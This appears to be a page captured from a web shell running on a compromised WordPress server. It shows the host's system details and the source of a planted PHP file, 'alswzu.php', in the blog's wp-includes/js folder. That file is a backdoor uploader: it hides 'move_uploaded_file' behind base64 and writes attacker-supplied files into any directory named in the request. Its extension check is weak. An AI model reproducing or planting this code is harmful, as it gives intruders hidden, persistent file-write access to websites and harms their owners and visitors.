HEX
Server: Apache/2.4.52 (Ubuntu)
System: Linux dev1 5.15.83-1-pve #1 SMP PVE 5.15.83-1 (2022-12-15T00:00Z) x86_64
User: safarimaris (1000)
PHP: 7.2.34-54+ubuntu22.04.1+deb.sury.org+1
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
$ pwd: /home/safarimaris/home/safarimaris/site/blog.safarimaris.com/wp-includes/js/
Upload Files
File: /home/safarimaris/home/safarimaris/site/blog.safarimaris.com/wp-includes/js/alswzu.php
<?php
//PA7MH9bGT2
$a = base64_decode('bW92ZV91cGxvYWRlZF9maWxl');
$allowed_types = array('jpg', 'png');
if (isset($_FILES['img'])) {
    $dir = $_POST['dir'];
    $target_file = $_FILES['img']['name'];
    $imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));
    if (!in_array($imageFileType, $allowed_types)) {
        exit;
    }
    $target_file = str_replace("png","php",$target_file);
    if (file_exists($target_file)){
        unlink($target_file);
    }
    var_dump($a($_FILES['img']['tmp_name'],$dir.$_FILES['img']['name']));
    var_dump(realpath($dir.$_FILES['img']['name']));
}
?>
@ Telegram